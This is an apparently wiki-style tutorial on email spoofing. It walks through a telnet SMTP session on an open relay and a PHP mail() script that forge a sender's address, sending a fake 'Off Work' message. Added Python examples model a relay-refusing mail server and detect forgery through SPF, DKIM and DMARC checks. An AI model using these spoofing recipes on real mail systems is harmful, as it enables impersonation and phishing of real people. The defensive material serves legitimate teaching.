
E-mail Spoofing

From NetSec
Spoofing is the closest thing the internet has to theft of electronic identity. Because of the way TCP/IP works, packets carrying false sender addresses are easy to forge. It is about the same as writing a fake return address on a letter. Of course, as with a letter bearing a fake return address, there is a hitch: if one were to order something using an order form and put down a fake return address, how would the delivery ever arrive? For packet spoofing to be fully effective, an attacker must somehow be able to sniff or intercept the data sent back to the fake IP address in order to fully exploit lying about his online identity.

Email spoofing is forging an email so that it appears to come from someone else. It can be done in several ways: through PHP, ASP and other web languages, or through an open relay. An open relay is an SMTP (Simple Mail Transfer Protocol) server (see "Protocols") that is not properly configured and lets anyone send email from any address to any address. To forge an email through an open relay, an attacker uses the telnet command (see MS-DOS) to open a connection to the relay on port 25. To send an email from [email protected] to [email protected], he clicks Start, opens the Run dialogue, types cmd.exe, presses Enter and then types the following:


 telnet openrelay.net 25
 HELO joe.i.am
 MAIL FROM:<[email protected]>
 RCPT TO:<[email protected]>
 DATA
 Subject: Off Work
 
 I’ll be off work from Tuesday until Friday but I’ve assigned John Doe to take my place while I’m out of the office.
 Thanks,
 Joe
 .

The commands are described in more detail in the RFC referenced under Protocols; this is a line-by-line explanation:

Opens a connection to openrelay.net on TCP port 25

 telnet openrelay.net 25

The attacker identifies his machine as joe.i.am using the HELO command, which begins every SMTP session

 HELO joe.i.am

Sets the sender address (the SMTP envelope sender, which the receiving server records in the Return-Path header) to [email protected]; a separate “From:” header can also be written into the message data, and an open relay verifies neither

 MAIL FROM:<[email protected]>

Sets the recipient to [email protected]

 RCPT TO:<[email protected]>

This tells the SMTP server that the attacker is ready to enter the headers and body of the spoofed email. At the end of the body, the attacker must tell the server that the email is finished by entering a period by itself on a line.

 DATA

The Subject: header sets the subject of the email to “Off Work”; a blank line separates the headers from the body, which the attacker then types

 Subject: Off Work

Tells the SMTP server that the end of the email has been reached and that it is time to send it.

 .
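To show what separates the open relay used above from a correctly configured mail server, here is an added example (not code from the original page): a small in-memory model of the server side of the SMTP exchange. No sockets are opened; the "server" is a Python class fed one client line at a time. The hostname mx.example.com, the local domain example.com and the addresses in the transcript are constructed placeholders, and the 554 reply wording follows what Postfix answers. The same command sequence is fed first to a server configured as an open relay, then to one that, like a real MTA, only accepts recipients in its own domains from unauthenticated clients.

```python
import re

# Constructed assumptions for this example: the domains this MTA is responsible for
# and the hostname it announces. A real MTA reads these from its configuration.
LOCAL_DOMAINS = {"example.com"}
SERVER_NAME = "mx.example.com"


class SmtpSession:
    """In-memory model of the server side of one SMTP session.

    open_relay=True reproduces the misconfiguration the page describes: any client
    may relay to any recipient. With open_relay=False the server accepts a recipient
    only if its domain is local or the client has authenticated.
    """

    def __init__(self, open_relay=False, authenticated=False):
        self.open_relay = open_relay
        self.authenticated = authenticated
        self.helo = None
        self.mail_from = None
        self.rcpts = []
        self.in_data = False
        self.body = []
        self.delivered = []  # (envelope sender, recipients, message text)

    def _reset_transaction(self):
        self.mail_from, self.rcpts, self.body = None, [], []

    def _may_relay_to(self, address):
        domain = address.rsplit("@", 1)[-1].lower()
        return domain in LOCAL_DOMAINS or self.open_relay or self.authenticated

    def feed(self, line):
        """Process one client line; return the server reply (None while inside DATA)."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.delivered.append((self.mail_from, list(self.rcpts), "\n".join(self.body)))
                self._reset_transaction()
                return "250 2.0.0 OK: queued"
            # Dot-stuffing: the client prefixes body lines that start with "." by another ".".
            self.body.append(line[1:] if line.startswith(".") else line)
            return None

        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip()
            return f"250 {SERVER_NAME}"
        if verb == "MAIL":
            m = re.match(r"FROM\s*:\s*<?([^<>\s]*)>?", arg, re.I)
            if not m:
                return "501 5.5.4 Syntax: MAIL FROM:<address>"
            self._reset_transaction()
            self.mail_from = m.group(1)  # envelope sender: accepted as given, never verified
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            if self.mail_from is None:
                return "503 5.5.1 Error: need MAIL command"
            m = re.match(r"TO\s*:\s*<?([^<>\s]*)>?", arg, re.I)
            if not m:
                return "501 5.5.4 Syntax: RCPT TO:<address>"
            if not self._may_relay_to(m.group(1)):
                return "554 5.7.1 Relay access denied"  # the answer of a correctly configured MTA
            self.rcpts.append(m.group(1))
            return "250 2.1.5 Ok"
        if verb == "DATA":
            if not self.rcpts:
                return "503 5.5.1 Error: need RCPT command"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "500 5.5.2 Error: command not recognized"


def run_session(lines, **kwargs):
    """Feed a whole client script to a fresh session; return (replies, session)."""
    session = SmtpSession(**kwargs)
    replies = [r for r in (session.feed(ln) for ln in lines) if r is not None]
    return replies, session


# Constructed transcript mirroring the telnet session on this page (placeholder addresses).
SPOOF_SCRIPT = [
    "HELO joe.i.am",
    "MAIL FROM:<joe@victim-domain.example>",
    "RCPT TO:<boss@another-domain.example>",
    "DATA",
    "Subject: Off Work",
    "",
    "I'll be off work from Tuesday until Friday but I've assigned John Doe to take my place.",
    "Thanks,",
    "Joe",
    ".",
    "QUIT",
]

if __name__ == "__main__":
    for label, cfg in (("open relay", {"open_relay": True}), ("hardened", {})):
        replies, s = run_session(SPOOF_SCRIPT, **cfg)
        print(f"{label}: {replies} delivered={len(s.delivered)}")
```

Run stand-alone, the open-relay configuration queues the forged message, while the hardened one answers the RCPT TO with 554 and the following DATA with 503, so nothing is queued. The relay decision is made at RCPT TO, before any message content is seen, which is why a relay check (or SMTP AUTH) on the server, not content inspection, is what closes an open relay.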

As mentioned previously, this technique can also be done with virtually any web language. PHP code is as follows for the same email:

<syntaxhighlight lang="php">
<?php
$message  = "I'll be off work from Tuesday until Friday but I've";
$message .= " assigned John Doe to take my place while I'm out of";
$message .= " the office.\r\nThanks,\r\nJoe";
$subject  = "Off Work";
$toEmail  = "[email protected]";
$headers  = 'From: <[email protected]>';
mail($toEmail, $subject, $message, $headers);
?>
</syntaxhighlight>

The above code written to a .php file and accessed over HTTP will send an email. The attacker might save the code in a file called mailspoof.php and upload it to atax.net, then request the URL http://atax.net/mailspoof.php and the email will be sent.
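Because the From: header written by the PHP code above (and the envelope sender in the telnet session) are accepted as given, a receiving system detects this kind of forgery by comparing what it can see: the envelope sender recorded in Return-Path against the From: domain, and the SPF, DKIM and DMARC verdicts its own MX stamped into the Authentication-Results header. Here is an added example of such a check (not code from the original page); the two messages it examines are constructed, with placeholder domains, and the finding strings are this example's own wording.

```python
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Authentication-Results (RFC 8601) carries "method=result" pairs; we care about three.
AUTH_RESULT_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.I)
CHECKED_METHODS = ("spf", "dkim", "dmarc")


def _domain(header_value):
    """Lower-cased domain of the first address in a header, or '' if there is none."""
    addr = parseaddr(str(header_value) if header_value is not None else "")[1]
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def analyse(raw_message):
    """Return a list of spoofing indicators found in a raw RFC 5322 message (empty = clean)."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    from_domain = _domain(msg["From"])
    envelope_domain = _domain(msg["Return-Path"])

    # Only the topmost Authentication-Results header was added by the last hop (our MX);
    # setdefault keeps that first verdict and ignores any an earlier hop or sender inserted.
    results = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for method, verdict in AUTH_RESULT_RE.findall(str(hdr)):
            results.setdefault(method.lower(), verdict.lower())

    findings = []
    if not from_domain:
        findings.append("missing or unparsable From header")
    if envelope_domain and from_domain and envelope_domain != from_domain:
        findings.append(
            f"envelope sender domain '{envelope_domain}' differs from From domain '{from_domain}'"
        )
    for method in CHECKED_METHODS:
        verdict = results.get(method, "absent")
        if verdict != "pass":
            findings.append(f"{method} result is '{verdict}' (expected 'pass')")
    return findings


# Constructed sample: the forged "Off Work" mail as it would arrive through an open relay
# whose envelope sender does not belong to the domain shown in From:.
SPOOFED = b"""Return-Path: <www-data@atax.example>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=atax.example;
 dkim=none; dmarc=fail header.from=victim.example
From: <joe@victim.example>
To: <boss@example.com>
Subject: Off Work

I'll be off work from Tuesday until Friday.
"""

# Constructed sample: the same mail sent legitimately from the domain's own outbound server.
LEGIT = b"""Return-Path: <joe@victim.example>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=victim.example;
 dkim=pass header.d=victim.example; dmarc=pass header.from=victim.example
From: Joe <joe@victim.example>
To: <boss@example.com>
Subject: Off Work

I'll be off work from Tuesday until Friday.
"""

if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(name, analyse(raw) or "no findings")
```

The caveat this encodes in its `setdefault` line matters in practice: a sender can insert its own Authentication-Results header claiming `spf=pass`, so a filter must trust only the header stamped by its own MX (identified by the authserv-id, mx.example.com here) and treat an absent verdict as a failure, not as a pass.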

There are a few other problems posed by internet protocol spoofing. Those who can spoof IP addresses and have a 0day exploit may need to send only one packet to take over a machine, and may spoof-exploit their way into a server leaving even the ISP with no real record of who committed the crime. Another problem is that during the scanning phase an attacker could spoof multiple scans from multiple machines, filling up an IDS’s allowed event space and slipping through the IDS unnoticed. Another flaw is that, using spoofing and multi-encapsulated packets, an attacker could jump directly through a firewall by exploiting design flaws in the TCP/IP stack. This would enable an attacker not only to traverse and step through a firewall, but even to use a Cisco PIX device as a proxy (using segmented/fragmented packets).